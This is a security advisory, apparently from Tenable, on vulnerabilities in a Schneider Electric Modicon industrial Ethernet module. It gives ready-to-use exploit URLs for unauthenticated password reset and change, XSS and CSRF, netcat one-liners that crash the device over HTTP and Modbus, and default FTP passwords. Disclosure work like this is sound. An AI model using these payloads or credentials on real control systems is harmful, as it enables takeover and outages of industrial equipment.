Synopsis
Tenable found multiple vulnerabilities in the Schneider Electric Quantum Modicon 140 NOC 771 01 Ethernet Module.
CVE-2018-7809: Unauthenticated Password Reset
An unauthenticated remote attacker can delete the existing username and password for the HTTP server by visiting the following URL:
http://[ip]/unsecure/embedded/builtin?submit=Delete%20Password
This also has the side affect of resetting the web server username and password to the default USER/USER.
CVE-2018-7810: Reflected XSS
A reflected XSS vulnerability exists in the HTTP server's endpoint /goform/formTest. A remote attacker can insert Javascript into the name parameter that will be executed in the context of the person who followed the link. An example follows:
http://[ip]/goform/formTest?name=<script>alert()</script>
CVE-2018-7811: Unauthenticated Password Change
The web server allows an authenticated remote user to change their password via the /secure/embedded/builtin endpoint. The web server also lets an unauthenticated remote attacker change user's passwords via the /unsecure/embedded/builtin endpoint. An example URL that changes the admin user's password to evilpass follows:
http://[ip]/unsecure/embedded/builtin?Language=English&user=admin&passwd=evilpass&cnfpasswd=evilpass&subhttppwd=Save+User
CVE-2018-7830: Unauthenticated Remote Denial of Service
A denial of service occurs when an unauthenticated remote attacker sends an HTTP request with no "\r\n\r\n" terminator. This will render the web server useless for ~1 minute The following is a one line proof of concept:
echo -e "GET /index.htm HTTP/1.1\r\nHost: 192.168.248.30" | nc 192.168.248.30 80
CVE-2018-7831: Cross-site request forgery
The password change functionality is implemented with an HTTP GET request in which the new password is specified. An anti-forgery token is not required to validate the request. Furthermore, the current password does not need to be specified in order to complete a password change. An attacker can forge a link to be sent to an authenticated victim. Once clicked, the password will be changed. Example URL:
http://[ip]/secure/embedded/builtin?Language=English&user=admin&passwd=evilpass&cnfpasswd=evilpass&subhttppwd=Save+User
Others
Tenable reported seven vulnerabilities to Schneider Electric. Schneider indicated one of our vulnerabilities (default accounts) was a duplicate and the other (modbus denial of service) was not a vulnerability. However, we've decided to document them here.
Default FTP Accounts
We found a handful of default FTP accounts. Some passwords we used required use of a VxHash collision disclosed by H.D. Moore in 2010.
| Username | Password |
| sysdiag | factorycast@schneider |
| fdrusers | sresurdf |
| fwupgrade | FaAmU5p2F~ |
| loki | ZfTljublsx |
Modbus Denial of Service
Modbus is accessible over TCP port 502. Tenable found that the following unauthenticated remote Modbus message will completely shutdown the Ethernet module:
echo -ne "\x0\xa8\x0\x0\x0\x5\x0\x5a\x0\x7\x0" | nc 192.168.238.30 502
Solution
No patches for these vulnerabilities exist. However, in their advisory, Schneider Electric advises customers to follow their Modicon Controllers Platform Cyber Security Reference Manual. They also recommend customers configure access control lists and "protect Modicon products with network, industrial, and application firewalls."
Disclosure Timeline
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.
Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.
For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email [email protected]
Contact our sales team